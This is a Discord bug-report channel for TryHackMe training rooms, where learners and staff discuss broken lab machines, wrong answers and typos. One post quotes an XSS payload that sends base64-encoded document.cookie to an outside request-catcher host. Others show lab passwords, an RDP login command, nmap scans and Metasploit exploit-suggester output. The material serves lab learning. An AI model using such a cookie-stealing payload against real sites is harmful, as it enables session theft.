#room-bugs

Gave +1 Rep to @simple merlin

Hi, I'm not sure who reported a bug with the MAL: Strings room (I've tried searching for your message again but I can't find it ) however, the VM has been updated (moved from Windows 7 -> Server 2019) and has been assigned more resources (double the CPU & RAM) than what it previously had

On second thought it actually could've been via email which makes sense. But anyhow, at least it is posted here for others

update: it was infact sent on to me via the support email

I spent a good 30-45 minutes trying to find a report of it here in the Discord

THM changed it.
I've fixed it now, question modified.

https://tryhackme.com/room/uploadvulns# task 5. We're supposed to attack demo.uploadvulns.thm

No, you are not.

but that wasn't one of the sites we changed the hosts entries for in task 1, and the website doesn't exist:

oh, I see

nm.

ty

fwiw

yup, didn't read carefully enough, ty

https://tryhackme.com/room/ustoun I restarted the box 5 times and waiting way more than 10min each time but port 1433 is still and always closed

Is ustoun0 on discord?

From 0-5min after deployment it is filtered and after 5+ min after deployment it appears closed

Hi. I noticed a bug on the Python Basics (https://tryhackme.com/room/pythonbasics) room. If I highlight and copy the contents of the "Python code output section," the flag for the "Flags" section is exposed. I thought I should report it here.

VulnUniversity seems to not work as intended. You can't scan directories using GoBuster or Dirb. The webserver seems to be down

Make sure you're specifying the port. It's not the default. The room is fine

Thanks, will check that out

this room is still bugged, impossible to work with

hi, sorry about the delay in getting this solved. I've been really busy with Uni and other pressing THM work. This issue is all resolved now (:

Found a borked link in the credits of ObscureWebVulnerabilities - final credited repo in Credits (Task 26) is listed, but is missing HREF tags.

are the latest credentials for the malstrings room working? https://tryhackme.com/room/malstrings I am trying xfreerdp -f /u:Administrator /d:MALSTRINGS /p:tryhackme123! /v:10.10.108.110 and it says AUTHENTICATION FAILED every time....

Np 🙂 thanks

Gave +1 Rep to @dusky junco

❤️

In the room https://tryhackme.com/room/winprivesc I cannot find the u:pw for the Windows machines anywhere in the text. I had to look it up here to find it, user:Password1

I am connected to to the vpn but not able to ping the machine .

Not all machines respond to pings, especially windows machines. That's not a bug, it's default configuration for Windows

In task 5 The missing text from task 2 and task 4 is found "You can connect to the target machine using RDP on your attacking machine or launching it directly from your browser.

The credentials are as follows:

Username: user

Password: Password1"

Can a mod test ustoun box? (<#room-bugs message>) With the port closed the box is not solvable. it seems 100% reproducible on my end. Does that occurs to other or just to me?

the mssql port?

Mods do not serve site functions. Mods are discord staff.

It's been reported and flagged to staff a number of times already

Yes I meant IT staff or room quality engineer

Cool thx 🙂

Gave +1 Rep to @eternal summit

Does the port remain closed 10 minutes after the target machine has been deployed? 🙂

It happened in dev too, before it was released. I suspect the resource boost came unstuck

Yes even after 30min and 1 hour.

The carnage room has a bug in the 4th last question ... The correct answer is being shown as wrong @hazy hinge @summer glade

hi folks! not sure if this has been brought up yet but https://tryhackme.com/room/networkservices seems to be bugged for task 3. The machine is supposed to have 3 ports open but it seems to be just one. I did: nmap -p- <ip>

In room https://tryhackme.com/room/linuxfundamentalspart1 task3 in browser machine interaction is not working

can you check https://tryhackme.com/room/overpass3hosting
machine keeps disconnecting on me :/

i also tried it with attackbox but same result

when i upload and get revershell it allow me navigate around for a minute but then it crash

alweays connection timeout or gatewat error

gateway*

idk if I'd call this a bug but:
https://tryhackme.com/room/introtolan
Task 1
The view site demonstration starts with a ring topology but the text info isn't in the same order. The flow of the "view site" demonstration makes more sense starting with ring. I personally would think the text descriptions on the left are out of order?

Definitely shouldn't be gateway timeout, there's no reverse proxy or anything.

i found some bug, i will try it again and will elt you know

let*

but if i had misconfiguration on my VM, i dont understand how it could crash on attackbox

Hey thanks for reporting. I'll add this onto my to-do list to investigate as I'm rather busy with university and especially Advent of Cyber 3 at the moment. However, I'll make a note of it now and I'll take a look when I get an opportunity (:

Gave +1 Rep to @delicate mist

Sounds good 🙂

Thanks (:

Doesn't affect functionality or anything so def a low priority anyways. Just saves people from bouncing around the description if they're following the visual side and vice versa lol

For sure! 😄 I understand. I'll take a look into this asap

https://tryhackme.com/room/networkservices
Broken image on Enumerating SMB Tab, don't believe its a local cache error but sorry it its a red herring

nope still,

but was connected for a minute

Hmm... I am also getting a 504 for https://LAB_WEB_URL.p.thmlabs.com from the IDOR room? 🤔

hold on... layer8 problem... 🤦‍♂️

I'm having an issue with the Attractive Directory room (https://tryhackme.com/room/attacktivedirectory). Trying to list the shares, results in a dialect mismatch:

Enter WORKGROUP\homesen's password: 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.197.21 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

This happens on both the attackbox and my local (fully patched) Kali machine. Though the attackbox gives a hint on what the issue would be:

smb1cli_req_writev_submit: called for dialect[SMB3_11] server[10.10.197.21]
Error returning browse list: NT_STATUS_REVISION_MISMATCH

Maybe someone can change the allowed SMB dialects for that box to at least allow smb 2.0

Using a Win10 client, I can connect just fine O.o

🤬 Strike that. It was yet another layer 8 problem 🤦

a lot of those are 🙂

advent of cyber, day 2, duplicate sentence https://tryhackme.com/room/adventofcyber3

Resolved, thanks for reporting!

Gave +1 Rep to @midnight junco

https://tryhackme.com/room/linuxfundamentalspart1 (Missing files in structure."passwords.txt" located within "folder1"
"todo.txt" located within "Documents")

grep "81.143.211.90" access.log (also returns nothing)

What is the value of the administrator cookie? (username = admin)
I set the Cookie to Admin and not to admin, it is a correct answer with the Uppercase Admin has but if u try bypass auth with the Uppercase Admin it doesnt work. u need lowcase admin hash, its only different string in the hash but it doesnt work 😄

thats from the event today (day 2)

it should be "a" right ?

from day 2

Query params are mostly used with GET request
Post data is not include in url mostly.
shouldn't the diagram should states that too

https://tryhackme.com/room/adventofcyber3 day2

I mean you can technically send query params in a POST, but I think it was to illustrate that some content is being sent

that's a tricky one, as HTTP is an acronym

I've always said an

Day 2 - After registering the account on static website (link in task content), there's a bit spelling mistake, adminisator. It should be administrator (if I am not taking this wrong or if the spelling is intended).

well i'm not actually sure about it

maybe i'm wrong

I don't know what the official best way is either

its mb its an

Ew. No way

That definitely needs to be "a HTTP request"

not entirely sure if this is a bug or if something's off for me, but thought I'd leave this here in case anyone else encounters it
I get this when I refresh login page (consequently I never get to the intended mxxxxx.html page intended for the advent second days task)

Request URL: https://static-labs.tryhackme.cloud/sites/aoc-cookies/redirect.js
Request Method: GET
Status Code: 404  (from disk cache)
Remote Address: 104.21.46.15:443
Referrer Policy: strict-origin-when-cross-origin

fixed

but an was correct when i checked with grammar checker

https://www.quora.com/A-http-or-an-http-which-is-the-correct-grammatical-usage

so then which is it

@glad badger Timmy which one

An we go by Grammarly. 🙂

Seeeee

I was right

should be fixed now. Apologies.

awesome! can confirm it works 🙂

advent of cyber, day 2 username "Admin" will give you a cookie that passes question 5 but won't actually bypass the login on the website.

Can someone help me with a problem in advent of cyber 3 day 2?

The static website doesn't seems to be working for me

Nothing happens even if I click the sign up button

It would not go to the sign up page

and I'm stuck at the login page

check the case of the username they tell you

also not a bug so #910210693821780018 is probably a better place

Sorry, I should have been more specific. The room is accepting an incorrect answer. I know what the correct answer is.

ahh right, I don't think TryHackMe is case sensitive

^, i entered uppercase before and it was correct, even if that didnt actually work

uppercase in which?

the answer box or the cookie?

i had upper case in both, question got completed but cookie didnt work

yh that makes sense if the answer form isn't case sensitive

In the Elements section of the dev tools, under body, what does it look like? Does it have link to the JQuery lib from Cloudflare? It's odd that it's happening on every browser and in your VM.

this?

I tried loading the site on my phone with the same wifi network but It didn't work

Then I used mobile data on my phone and it worked

IDK why tho

imagine if its the router

ig so

Are you able to drop the following above the tree-foreground? <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script> and under that <script src="./snow.js"></script> I would do a screenshot, but discord is not giving me an option to attach anything.

to attach things to verify with the tryhackme bot on discord

!docs verify

wait

Thank you!

Gave +1 Rep to @rugged canyon

It worked on mobile data wifi hotspot

But not on my home wifi

nice

still weird but nice

IDK what's the difference between these too

ikr

isp doing some anti-jquery nonsense 😂

all isp in my country is said to be monitored

IDK if this is true tho

hmmm well there is a tool to check that

can you tell me pls?

if shadow can find it again sure

It's actually pretty weird that the JS wouldn't load on my wifi but it would on my mobile data

My wifi's actually faster than the mobile data

found it

ooni probe @barren pivot

ok thank you

Gave +1 Rep to @rugged canyon

they have an app on f-droid

ok

apparently on google playstore too

can it detect specific libraries being blocked? that would be pretti cool

just did not check there first

think it can detect most of those things but unsure actually

oh cool

I'll check that out

also the app is made by the people behind tor so yeah of course they have knowledge in the field

oh tor I see

There's a desktop app too

I'll try installing the desktop app

yeah just having it on your phone means you can compare the results

yes

(dont answer if you dont want to) but you're not possibly from china are you? found an issue on git saying that this CDN is banned there -> ajax.googleapis.com
which possibly loads the jquery

uhh not from China

But very close to China

A country near China which has recently gone worse

might be the same then
well hopefully the onii thing gives a good answer

Yes

Now the website works even with my wifi

what the meeps

Well the onii test result was kinda interesting

It showed some censorship which I'm aware of

Things like facbook, insta, twitter etc

why in the world would it just start working tho

The js files which are needed were not loading before mobile data

They showed 404

After I loaded them once they now work with my wifi

oh so its just a happenstance then

that you have it locally in your dom still or something

odd that there's different bannings on your ISP & your phone

yea ikr

It's rly weird tbh

And also the bannings differ with different isps

probably because they're cached now

cookies are the biggest scam lol

I played Advent of Cyber, did everything that room told me, refreshed the page and it didn't work. You had to go there again and press on here link again for the page to display content. Refresh doesn't work, when theoretically, it should. These are trolls

Refresh worked for me once I pasted the new value into the cookie

as mentioned in #site-bugs this is not a troll. You had the wrong page

Although the page loads and I can complete the challenge, I still get the same error (different remote address tho) and the page keeps refreshing in a loop, but if i delete the cookie, the reloading stops.

Looks like I submitted wrong cookie in the answer for what's the administrator cookie in the day 2 of The advent of cyber, it still accepted it as correct answer

Although a different cookie value worked on the siite

Hi @dusky junco , no worries! I'm glad that it's fixed. Thank you so much.

Gave +1 Rep to @dusky junco

hi

https://tryhackme.com/room/osqueryf8 plase can you update the answer for this question according to the plugings update on the https://github.com/polylogyx/osq-ext-bin

USTOUN MS-SQL database is broken and completely fails to start. Box boots but the MS-SQL Service fails to start and port is forever closed.

help

Hi I'm in OWASP Juice Shop room right now, do anyone have same issue with the missing images in every task??

This is a known issue and has been flagged to the team already

Not a bug. Windows machine. Default behaviour

Image not loading

Not every but some

Now seems fine evry image is loading

Oh okay, because of the missing picture I don't understand the material and can't answer the task and can't continue to task 3

I've found so many rooms also have same issue...images not loading or it missing?

Make sure your ISP does not block the image host. Often imgur.

Especially on older rooms because you couldn't upload images directly previously

Yeah it's happen in older room...thank you for your help.. I'll check what you suggested

If it's being blocked, I suggest changing your DNS as a first measure. Don't use your ISP's DNS servers

But in the network services** room that image isn't loading
I send screenshot above

I do not represent THM
I can provide basic troubleshooting from my understanding of how everything works
I can't change content on THM unless it's content I created

That's flaticon breaking their site, totally out of control of everyone except flaticon

@glad badger There's a bunch of flaticon images in the network services room and they're no longer accessible in many countries. From memory, they were just icons rather than being critical to the task.

So in AoC3 on day4 (today) it gave a path to a wordlist (/root/Rooms/AoC3/Day4/) but in the AoC3 folder there is a path to day9 (/root/Rooms/AoC/Day9) I think it has some parts of the day9 challange in it

Sssssshhh

Updating the AttackBox is a relatively complicated process, so a lot of the material will have been added at once :)

ah

well, uhh imma just ignore it then

Should have been encrypted with a password then

Also true

on on a diferent account or something

I mean, you have root access

true

inb4 I convince CMN to install a rootkit to release files on a timer

they could atlest hidden it better

Instead we have hidden Day 9 until December 9th. 😄

(It's still there)

Day 9 the task. 👍

ah

lol

Good spot though. 😄

thx

See if you can find who was put on the naughty list in Day 4? 😄

I just saw a directory named rooms and a subfolder named AoC3 and i just had to check (Im a curius person), btw there is a copy of the file that is in the Day9 in the /root/ folder :)

k

today's flag
I forgot to close the bracket but still it worked

That's just answer tolerance. Not a bug.

is there a channel for them?

It's answer tolerance. It's an intended feature of the site, hence not a bug.

oh i get it now

👍

~~Still don't know what I did wrong this time 😢 ~~

Is it actually a thing?

Yes it is when you completed Day 4. 🙂

https://tenor.com/view/obi-wan-confusion-gif-10824788

Santa has a calendar.

repost.

AH LOL

who is "MurilandOracle"?

I checked everywhere except on the website

Me

ah

Not sure if already known or cared about but thought i'd mention it. if using the attackbox on day4 you can access a pcap file for day 9. (assuming stuff for other days too)

nevermind. seems someone mentioned already.

In Complete Beginner (I'm doing this for fun) in Introductory Researching, Task 4 the question 'SCP is a tool used to copy files from one computer to another.
What switch would you use to copy an entire directory?' shows the hint of 'man scp' but the question only has 2 asterisks AND 'man scp' is reported as the wrong answer.

I have tried man scp, cp, cp -r, but nothing is working.

I could only find something for day9, seams like there are no files on it that i could find that are for future challenges

last day thm challenge contained a wrong explanation to fuzz using cluster bomb, but it should be sniper

kindly fix it

Cluster bomb is correct for the demonstration where the username is not known.
It is, however, very misleading for the actual challenge where the attack type should indeed be Sniper

cc @dusky junco

I'll take a look into this today

I had to change how the web app performed at very last minute which would've affected how the attack type in burp is so the content might be a little bit misleading

thanks for letting me know

for cluster bomb, does the username & password attack will be exponential per line in wordlist?

I'm not retyping this, so enjoy:

thanks

Gave +1 Rep to @obsidian kiln

why the bot shows invalid-user?

lol

Bug with discord on mobile

Note sure wether it's intended or not, but in room https://tryhackme.com/room/linprivesc , in the "challenge" part
||You can see precisely where is the root flag from the .bash_history file of leonard (thanks to the cd and cat commands), so you can skip the last part of the privesc with the SUID base64 command.||

This happens in most rooms lol

Older rooms don't get updated

But newer ones are checked before release

Hmm... I am confused about the XSS room (https://tryhackme.com/room/xssgi). I can't solve the last task (number 8).
The payload seems to be not working but I have the feeling that the room is broken(?).
The first option with nc on my machine (yes I am on VPN) is simply not giving anything back.
The second option with the THM Request Catcher gived me a "Someone looked up this domain" as a result but nothing else. The div is looking like this <div><textarea class="form-control"></textarea><script>fetch('http://<my_session_id>.log.tryhackme.tech
?cookie=' + btoa(document.cookie) );</script>

I created now a new session but this doesn't even show any DNS request captured...
I know that it is working because I can trigger it manually with my browser and see requests coming in

i am also stuck on the same step. i'm coming back to it later, i;ve been stuck on it for an hour and have made no progress. 🥲

In https://tryhackme.com/room/walkinganapplication on Task 3 Flag 1:
Trough the link in the HTML comment I was able to get the url for the "thm-framework-login" and could log in with the default credentials. after this the Flag was shown as clear text to me but the Flag isn't accepted as answer?

In https://tryhackme.com/room/ccpentesting on Task 20 Flag 9:
Even with the write up information it doesn’t recognize the answer when trying to submit. I understand the answer and command though whichever way entering it doesn’t recognize the answer. Any help or advice?

i can't get through 1 day lol, I just can't close this window to see new grinch position

hey all, i just joined, really excited about all this. But there's a question which just plain wrong, i wanted to bring it to someone's attention.

hey mate! Looking at your screenshot you are running whoami on the attackbox. You are supposed to run whoami on the target machine that you start at the beginning of the task. These are separate machines.

uh oh

sorry for breaking your website

okay i found my way back now that stuff about "but there's no gui" makes more sense. ty, mods = gods

fwiw, cry is THM staff

Not a mod, good god we wouldn't make cry a mod

this is a big place, you guys really have 100,000 discord users?

that's nuts

I have no idea how to use Discord properly yet, so I apologize if this is not the place to mention it. However, I found a "bug" on day 2 of this years' cyber advent event. What's the best way to mention it? Nothing is technically broken, just unlocks if you type in a specific username without having to do any cookie manipulation...

@remote hamlet

You’re welcome to report it here but I don’t know the likelihood of it being fixed

Hello,
I think there is a bug (maybe i didn't understand well) with Advent of Cyber 1, Day 9. When i requests (curl or firefox), IP:3000, nothing happens. And without the JSON in the response, i can't resolve the challenge :/

Room: Hackermethodology
Section: Exploitation

Seems like the burp suite logo is not loading due to CORS policies.

charts lag the webbrowser here https://tryhackme.com/room/tmuxremux
firefox
16 ram machine bare metal

Todays's task, this should prob be an AND not an Or. https://tryhackme.com/room/adventofcyber3

the either is prob off too, unless you were going with "set up your own kali box, or use an attack box"

That labs link means you don't need the VPN

It's accessible from outside THM

ok, was just pointing out the grammar. Is that helpful or not? I'm not always sure.

Hit the red button James. You know you want to do it.

It could be clarified, but IDK why it should be an AND?

the grammar is fine, you can access that link without any form of attack box or VPN. you can do either one, accessing the link or going through the attack box

I see what you're saying, it still reads as a little bit awkward, but that's good to know

thanks!

that wasn't clear to me

AoC3 - day 4, mising closing parenthesis

I still have the same problem

it has not been fixed yet

It's still happening

@teal barn Please stop

THM staff have been made aware

Pinging everyone that's seen the issue is not helpful and is honestly spam

It would be good if the issue tracking on room bugs was public

The issues tab on rooms was abandoned due to abuse.

or maybe a banner on section on room page to mention that a bug troubleshooting in on the go

sad 😦

this issue exists since April 2021 and nobody is able to track any change

or sometimes we leave a message here but if nobody anwser we can't know if the staff has been informed or not

and if it is fixed one day I won't have any way to be notified it's fixed

other than coming here every week to ask if it's fixed

feels like there is a lack of transparency on issue tracking

You have to remember that many rooms, including that one, are community submitted.
The creator is in charge of fixing them etc.
It's not TryHackMe's responsibility to maintain their content unless THM paid for it

you are right, sorry

yes but at least that players are informed that there is a bug existing, that the content creator has been asked to fix and knowing teh room status: like actually broken, so people stop loosing hours to find that the box is broken and have to do forensics on the channel to understand that it was already identified

There's a feedback form in #feedback-and-ideas

I think the issue tab should be re-introduced but status could be updated only by staff (not content creator) to avoid abuse

Staff are super busy

We can't be updating the issue tab for every room

That adds a lot of workload, verifying and replicating bugs.

Not only just updating, but half the bugs reported here are either user error or answer tolerance.

90% of room related emails are actually user issue.
It takes forever for me to verify the rooms are not broken because I have to get in touch with the content creator and then try and see if someone can replicate the bug, only to find out that someone didn't follow the steps in the room correctly.

I submitted many things to https://tryhackme.com/feedback but it's the same oppacity, I have not feedback to know it's wontfix, under work, etc. it would be better to have something like https://docusaurus.canny.io/feature-requests where the staff logs most papular idea, users can vote form them and be notified on word progress

And that's another thing to go in #feedback-and-ideas
Stating it in #room-bugs will not help, given that it's not a room bug. It's a feature suggestion.

Was just answering that I have already done it, including for this idea.

I sympathize with that but the issue for real bugs status stay the same 😦

I'm really bored getting into old room (or even not so old rooms), starting hacking, being stuck during hours, reading write-ups to find a service is missing, of the app doesn't behave the expected way, report it on "room-bugs" channel on discord and find it was reported months ago many many times, a bug status could have spared me hours of necessary struggling by just informing me that the box is actually broken

when a room is confirmed broken, just updating the status without giving much details shouldn't take more than 30sec

I hope THM will continue to recruit more staff to help you be less busy 🙂

Site issues are higher priority than room bugs unfortunately.

And if it's not a staff room, it becomes really difficult for us to get a hold of the machine and fix it as we don't always have the tools and people ready to do that

it's not even about fixing room bugs, its actually a website feature request to inform users a room has bugs

So why is it in the room-bugs chat and not on the feedback form? 🙂

I already submited it in the form

My point still stands:)

and it's because I came ask here to see if teh room https://tryhackme.com/room/ustoun was fixed

I just realized it has been reported broken dozens and dozens of time since April 2021, just a "status; broken" information banner on the room would have avoid all that discussion 🙂

Look, I know you're here to complain that it hasn't been fixed, you've made that clear.
At the end of the day, it's not going to help you get your issue resolved faster.

You have submitted your feedback to the feedback form and that's great.

Now all I'll ask is that we leave the issue and end the conversation because I don't have the time or energy rn

Deal?

I don't complain it's not fixed, but that it's not written on the room page that its broken

sure

Cool, thanks

Room : https://tryhackme.com/room/adventofcyber3
Bug : in the screenshot below (from exemple given in the room), i've highlighted an invalid HTTP parameter, because it's missing php protocol before filter

There is now one for Day8 too

about the loki outdate issue https://tryhackme.com/room/yara you might want to check the entire room and file1/ind3x.php I did test the sudo and please mention me for updates I really want to know.

basically file 1 didn't work at all it was always detected as "clean", I didn't have issues with file2/ I remember there is also other thing that was wrong about the wrong but I forgot.

Complete Beginner path - Network Services 2 - Enumeration NFS - NFS-Common, link broken (https://packages.ubuntu.com/xenial/nfs-common)

Should be this https://packages.ubuntu.com/bionic/nfs-common

Thanks Ninja...

Gave +1 Rep to @eternal summit

Godd Morning, I'm in the file Inclusion Room on Task 2. I have to visit the Link "http://MACHINE_IP/" but it doesn't work, i just get the error that the server is not found

You will need to replace machine_ip with actual IP address of the machine

getting this error then:
Error code: 405

Message: Method Not Allowed.

Error code explanation: 405 - Specified method is invalid for this resource.

Are you using the VM IP address? Also are you trying from OpenVPN or AttackBox?

I'm using this one: Your machines IP is 10.10.78.39

Have you connected via OpenVPN? or are you trying from the AttackBox?

from the AttackBox

it's working for me

I meant the IP address I got upon deploying the lab

You might be trying the IP address of attackbox. Use the IP address shown on Task page

Allright that's weird. Now i clicked the green button "Start machine" and then startet the Attackbox. Not the blue button for starting the Attackbox.
The room changed the link I've send before to the right link with the IP Address of the Machine.
works now.

Thanks for ur help

Gave +1 Rep to @raven cove

The "Linux Fundamentals Part 1" room task 7 question2 and question3, shows right answer on wrong answers

the correct commands should be "echo password123 > passwords" and "echo tryhackme >> passwords"

Just wanted to report that in room "Network Services", under " Enumerating FTP":

"How many ports are open on the target machine?"

site says 1 is wrong, and 2 is correct, but the machine has only port 21 open

Did you scan for all ports?

yep

# Nmap 7.92 scan initiated Tue Dec  7 10:22:02 2021 as: nmap -p- -vv -sV -sC -oN nmap.txt -Pn 10.10.241.10
Nmap scan report for 10.10.241.10
Host is up, received user-set (0.056s latency).
Scanned at 2021-12-07 10:22:03 UTC for 31s
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 63 vsftpd 2.0.8 or later
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.11.55.157
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             353 Apr 24  2020 PUBLIC_NOTICE.txt
Service Info: Host: Welcome

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Dec  7 10:22:34 2021 -- 1 IP address (1 host up) scanned in 31.34 seconds

Perhaps the other service didn't start yet 🤷‍♂️
Could you try scanning it again?

sure

oh

ok port 80 just got opened

guess I was too fast with machine boot

false report then 🙂

Have fun👍

didn't knew I had to wait after I get the IP on the site

Yeah, it is similar to how our local system takes time to boot
The target machine does take time to boot properly as well🙂

yeah ofc makes sense 🙂

tnx for the help 🙂

In OWASP Task 11 i type in ( in the browser ) the machine ip with /login and it just wont load the page

Room: https://tryhackme.com/room/mrrobot
The machine is very slow, I'm doing directory enumeration with directory-list-2.3-small.txt wordlist and it takes like forever. (not even 10% in about 15mins)
Considering all the rooms I've done so far, doing directory enumeration with directory-list-2.3-medium.txt never takes more than 15 mins.

I have talked about this here #site-support message and here #infosec-general message

Please acknowledge.

Hey Hey
AOCyber Day 4 Step 10.4 has a misleading line instructing folks to use a Cluster Bomb attack instead of a Sniper attack that the video used.
Figured I'd mention it here

I didn't finish this module but still have awarded with the completion badge

https://tryhackme.com/alperkaya787856/badges/intro-to-web-hacking

IIRC, it is already known.
Completing the last room or something similar triggers the badge generation🤔

yep

I was thinking the same

Probably completing only the room "command injection" gives you the badge

It says it too

Hello, I believe Anonymous machine has a bug

https://tryhackme.com/room/adventofcyber3
Task 12 (Day 7)

Check out HuskyHacks's walkthrough video for day 7 here ---> HuskyHack's should be Tib3rius

Fixed. Thank you for reporting. 🙂

Gave +1 Rep to @void vortex

i think i found a error in the walking an application room on task 3

when you goto the address that is listed it gives you a NGinix page and not the acme tools site. also I think the Flag might be missing for the source code because of this

Kenobi on the first real question states scan with nmap. the answer is 7 ports when really 8 are open unless I cant read lol

https://tryhackme.com/room/sqlilab
Task 5, no matter how you log in, always "Logged in as Unkown"

there's some potential errors in the django room

unit 3 has you including a project in itself, which is not possible

at least the way it's explained seems off

@obsidian kiln

HI I have issue with ice room

OWASP Top 10 room: https://tryhackme.com/room/owasptop10
In Task 26, we are told to browse a Github Gist, and copy some Python code from there. But there is no Python code, only different JSON files :/

And typing the code from the screenshot is a tad bit tedious 😉

In AoC3 Day9 some of the answers of the questions re shown in the images right above

Not really a bug, but...
Advent 3, day 8: reg add ... uses path with forward slash: C:/ while in Windows you usually use back slash.

Also, day 8: in the Windows machine, I do not see this sliding panel for copypasting on the left.
The suggested key combination also does not work.
I am using Chrome on MacOS (latest).

I remember being here and clicking on revisions and scrolling down a bit to find the python file.

Thanks. Ended up typing it manually. Maybe someone can add this perma-link to the task: https://gist.github.com/CMNatic/af5c19a8d77b4f5d8171340b9c560fc3/103714e0fd2b9521a8636aeab3da1406e0afb9f4

Gave +1 Rep to @flint robin

Hi, not really a bug but in the room https://tryhackme.com/room/sysmon in task 2. There is a sentence rewritten twice. In Sysmon Config Overview at the end of the paragraph. "Configuration preferences will vary depending on what SOC team so prepare to be flexible when monitoring.** prepare to be flexible when monitoring.**"

Disk Analysis & Autopsy room is bugged, the images show as 0 bytes

Attacking Kerberos room seems to attack Rubeus when instructions are followed. Is it Windows defender?

HI I have problem with ICE room

msf6 exploit(windows/http/icecast_header) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

Name Current Setting Required Description

SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available ex
ploits

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[] 10.31.186.70 - Collecting local exploits for x86/windows...
[] 10.31.186.70 - 4 exploit checks are being tried...
[+] 10.31.186.70 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[*] Post module execution completed

I tried the listed vuln but that says it not x64

today's AoC: redundant sentence: https://tryhackme.com/room/adventofcyber3

@harsh oyster 👀

(hope this ping is correct, didn't find a mod role that was pingable and you seem to be online)

-mute 662379968600473612 24hrs scam link

🔇 Muted TR1.#2531 for 1 day

-mute 477272021416542208 24hrs scam link

🔇 Muted !ⲘꞄ-DesTroYeR#3679 for 1 day

Thank you <3

Gave +1 Rep to @mystic crest

Should have probably posted this here:
#878393611929129000 message

Similar remark
#pre-security-legacy-path message

@spring summit or anyone else, I have been working on the rocket challenge (finished it once already). There is one issue which I don't know if it's on my part, the || cap on ruby || is not set properly, making the privesc impossible, is that normal ? What is causing that ?

Not a bug. You're missing something.

Are you sure ? I restarted the VM, did the exact same thing and || ruby || was properly set, so it does look like a bug

It's a static image -- it can't change between deployments. At least, I assume there's no autogen setting capabilities that could fail based on some weird external factor @spring summit?

I would imagine you're getting hit by the other protection method in place which "stops it from working"

If you're talking about || apparmor || that's not it, I mean that || getcap returns no special capabilities for this binary || on odd occasions

Well now that is weird. Again, it's a static image though. It shouldn't change between deployments

Like, literally, it's like starting a saved copy of the same image every time

There has been some weirdness with AWS being haunted before

Aye, that is true

Muir you remember my box that you tested that was haunted on that instance?

Mhm

Should be fixed by a redeploy though

Yeah, I can't think of any other reason for that to happen tbh

I kno :D, I finished the box already, I'm currently remixing this one for my teaching dashboard. Redeploy did fix it but I was surprised about this issue

Last time with AWS being haunted, it was also file permissions

Yeah, that is weird.
I suspect James is right and it's AWS being really weird. See if it happens again?

I guess I can add a service or Cron that will periodically set the cap

You don't share the instances

Very much unnecessary

Or, if you do, it will die after about 6 hours if you're sharing one between students

I can clone instances

Rooms.

Not instances

(teacher dashboard)

Teacher dashboard lets you clone machines made by other people? Huh, TIL. @dusky junco you seen this?

It's a partnership with thm

Anyway, thanks for the help

Last I spoke to Ben neither of us could clone machines owned by other people through the dashboard 😆
This is the first I've heard of that permission actually being possible, so thanks for that

Like, we can clone our own, but not from accounts that don't belong to us

It probably means I should also raise with THM that I don't want my non comissioned machines cloned, because I've seen what some establishments do to them...

Like there's some real IP issues on stuff that THM hasn't paid for from me, cc CMNatic

But yeah, TL;DR: for that issue @tulip solstice, it's probably a one-off unless you can replicate? Probably not worth setting something in place for it unless you really want to. AWS is just very, very rarely weird with filesystem stuff

Thanks

Gave +1 Rep to @obsidian kiln

https://tryhackme.com/room/networkservices --> task 3 --> image https://image.flaticon.com/icons/svg/2879/2879093.svg doesn't exist anymore

I've raised this with THM staff

There are no autogen capabilities in rocket. The entire thing was submitted as a static image with all routes pre-developed and absolutely no build scripts

Yeah, must just be AWS stuff then. Thanks mate 🙂

no worries 🙂

Not a bug but "in all types" is repeated twice on the first paragraph in OWASP Juice Shop

teachers can clone public rooms and therefore the attached instance iirc

(maybe if theyr'e set to cloned in the manage page aswell? not sure about that one though)

not just anyone's vms though

We've had some clarity from Skidy on this one, happy with the explanation and how it all works now

oh cool cool

hopefully my understanding isn't far off haha

They aren't 🙂
It was a special case

roger dodger

Hi admins I think I found a issue in day 2 Web Exploitation i'm getting really weard out puts with using cyberchef

I can share my out put if its needed

Nvm the problem is my computer .... he is changing the output 😅 after copy paste

For the Intro to x8664 room, I think there's a typo in the Intel Data type suffix list. For double precision and double word, both suffixes are "l". From research I did, cause this was confusing to me, I think it's supposed to be "d" for double precision? Can someone clear this up for me? See the Snippet below for reference.

Hey guys, in the room "linuxfundamentalspart2" I can´t conect to ssh machine. I have the command ssh tryhackme@(iptarget) so it needs a password, and the password "tryhackme" don´t works. It´s my error or it´s a bug in the room?
Room: linuxfundamentalspart2
Task 2
The terminal says: Permission denied, please try again.

are you accidentally typing in the correct password, are you trying to paste it in from clipboard? is caps lock on? forgive me for being basic, but i don't recall there being an issue with that room.

I´m trying with the password "tryhackme" with out quotes

have you tried restarting the system? sometimes the systems bug out and don't work correctly.

Thanks, I'll try it tomorrow because I turned off the machine by mistake.

Gave +1 Rep to @untold olive

Alright, sorry I couldn't get you fixed tonight. Have a good one.

Don´t worry thanks!

I'll also boot up the machine and test to make sure it works on my end.

Okay that´s great, maybe I did something wrong

Yeah, I booted it up and was able to login without a problem.

U used vpn? 😮

Soo I´m noob because I´ve been trying for 2 days xD

Yes, vpn.

Cyber Advent room, day 4. Authorization is spelled incorrectly. It is written as 'authorisation' with an S instead of a Z.

That is not incorrect. That is the British English spelling.

Hey all. Found broken picture in task 3: https://tryhackme.com/room/networkservices

